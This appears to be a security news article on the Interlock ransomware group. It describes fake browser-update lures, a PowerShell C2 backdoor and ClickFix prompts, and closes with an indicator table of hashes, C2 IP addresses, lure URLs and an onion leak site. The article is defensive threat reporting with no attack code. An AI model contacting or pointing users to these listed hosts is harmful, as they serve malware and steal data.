Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.

Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.

This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.

– Advertisement –
Google News

Attack Mechanism and Execution

Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.

Interlock Ransomware — *Screenshot of Interlock’s DLS*

Here’s how the attack unfolds:

1. Fake Updater Deployment:

The ransomware’s initial access vector is a fake browser update hosted on compromised websites.

These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller files. When a user executes this update, it:

Downloads and runs a legitimate installer.
Simultaneously, it launches a PowerShelcl script acting as a backdoor.

2.PowerShell Backdoor:

This script operates in a loop, continuously executing HTTP requests to communicate with command-and-control (C2) servers. It’s designed for resilience, utilizing:

A continuous communication loop with the C2 server for persistence.
Collection of system information including user context, system details, and more, then transmitting this data to the attacker.

3.Command Execution:

The C2 server can issue various commands, including:

Terminating the backdoor.
Deploying additional malware like keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).

Domain and IP Clustering for Resilience

According to the Report, Interlock’s operators employ a strategy of IP address clustering to maintain their infrastructure’s resilience:

Cluster Composition

Each cluster typically includes:

One IP from BitLaunch, allowing cryptocurrency transactions.
One from Hetzner Online GmbH, known for its robust hosting services.
A third from various autonomous systems to complicate disruption efforts.

ClickFix Technique for Initial Access

Around January 2025, Interlock adopted the ClickFix technique:

Deceptive Prompts: Victims are persuaded to manually execute malicious PowerShell commands through fake CAPTCHA verifications or system prompts.

Fake Installer Distribution: This technique was used to distribute a fake installer payload, but its usage seemed to have been abandoned by February 2025.

The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.

With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.

Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.

Indicators of Compromise (IoC)

The following table lists the IoCs associated with Interlock’s activities:

Category	Indicator Type	Indicators
Fake Updater	SHA-256	576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes)
ClickFix PowerShell Loaders	SHA-256	5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes)
Interlock RAT	SHA-256	1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes)
Keylogger	SHA-256	5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes)
BerserkStealer	SHA-256	eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf
LummaStealer	SHA-256	4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e
Windows Interlock ransomware	SHA-256	4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes)
Small autoremove DLL used by the ransomware	SHA-256	c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
Linux Interlock ransomware	SHA-256	28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
Data Leak Site	URL	http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion
Backdoor C2 – Cluster 1	IP Address	23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184
Backdoor C2 – Cluster 2	IP Address	23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47
Backdoor C2 – Cluster 3	IP Address	216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41
Backdoor C2 – Cluster 4	IP Address	216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41
Backdoor C2 – Cluster 5	IP Address	206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158
Backdoor C2 – Cluster 6	IP Address	85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189
Backdoor C2 – Cluster 7	IP Address	65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117
Backdoor C2 – Cluster 8	IP Address	64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11
Backdoor C2 – Cluster 9	IP Address	177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202
Compromised URLs	URL	http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs)
ClickFix URLs	URL	https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs)
PowerShell backdoor C2 domains	URL	refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs)